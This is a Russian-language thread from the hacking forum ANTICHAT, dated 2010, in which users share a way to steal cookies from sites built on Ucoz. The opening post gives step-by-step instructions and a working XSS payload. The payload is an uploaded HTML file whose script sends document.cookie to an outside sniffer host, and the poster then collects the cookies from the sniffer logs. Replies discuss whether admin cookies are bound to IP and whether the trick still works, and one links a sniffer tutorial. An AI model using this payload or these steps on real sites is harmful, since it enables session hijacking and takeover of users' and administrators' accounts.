HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

А вот и долгожданный Ucoz
  #1  
Старый 18.03.2010, 01:50
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
С нами: 9171191

Репутация: 43
По умолчанию А вот и долгожданный Ucoz

Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки
Код:
<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>
2) Загружаем наш html файлик через "Обзор"

Смотрим скрин

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин

Ну вот и всё...

Последний раз редактировалось Dr..VATSON; 18.03.2010 в 19:22..
 
Ответить с цитированием

  #2  
Старый 26.03.2010, 09:56
general.fox
Участник форума
Регистрация: 09.11.2009
Сообщений: 265
С нами: 8686461

Репутация: 18
По умолчанию

На UcoZе куки Админов привязаны к IP.
 
Ответить с цитированием

  #3  
Старый 26.03.2010, 09:58
general.fox
Участник форума
Регистрация: 09.11.2009
Сообщений: 265
С нами: 8686461

Репутация: 18
По умолчанию

Хотя может я ошибаюсь...
 
Ответить с цитированием

  #4  
Старый 04.04.2010, 17:16
Koder45ru
Новичок
Регистрация: 18.02.2010
Сообщений: 4
С нами: 8541138

Репутация: 0
По умолчанию

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
 
Ответить с цитированием

  #5  
Старый 05.04.2010, 23:03
Rejiser
Новичок
Регистрация: 09.05.2009
Сообщений: 27
С нами: 8951802

Репутация: 21
По умолчанию

Цитата:
Сообщение от Koder45ru  
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
не подскажешь где читал?)
 
Ответить с цитированием

  #6  
Старый 06.04.2010, 07:52
sparrow3000
Участник форума
Регистрация: 27.03.2009
Сообщений: 248
С нами: 9013262

Репутация: 54
По умолчанию

Цитата:
Сообщение от Koder45ru  
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
если про бесцветный смайлик со скриптом то это не пашет уже
 
Ответить с цитированием

  #7  
Старый 09.04.2010, 05:14
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде
 
Ответить с цитированием

  #8  
Старый 14.05.2010, 12:06
NeoX
Познающий
Регистрация: 23.08.2008
Сообщений: 95
С нами: 9324141

Репутация: 45
По умолчанию

еще актуально?
 
Ответить с цитированием

  #9  
Старый 16.05.2010, 22:56
niva622
Новичок
Регистрация: 05.11.2008
Сообщений: 11
С нами: 9218527

Репутация: 0
По умолчанию

еще актуально, но на некоторых сайтах запрещено добавлять html файлы..
 
Ответить с цитированием

  #10  
Старый 26.05.2010, 16:48
<Maxwell>
Новичок
Регистрация: 27.10.2009
Сообщений: 23
С нами: 8704870

Репутация: 12
По умолчанию

Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
red.Button - UCOZ Pack v.3.0 - дополнении к доргену GivioN Разное - Покупка, продажа, обмен 0 03.01.2010 23:13
Скрипты под Ucoz Vandam PHP 14 26.02.2009 16:50
Лучший стих для античата $ED$ Болталка 29 12.02.2009 02:47
Было в фирме три админа.!!! =) Utochka Болталка 15 18.03.2006 03:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...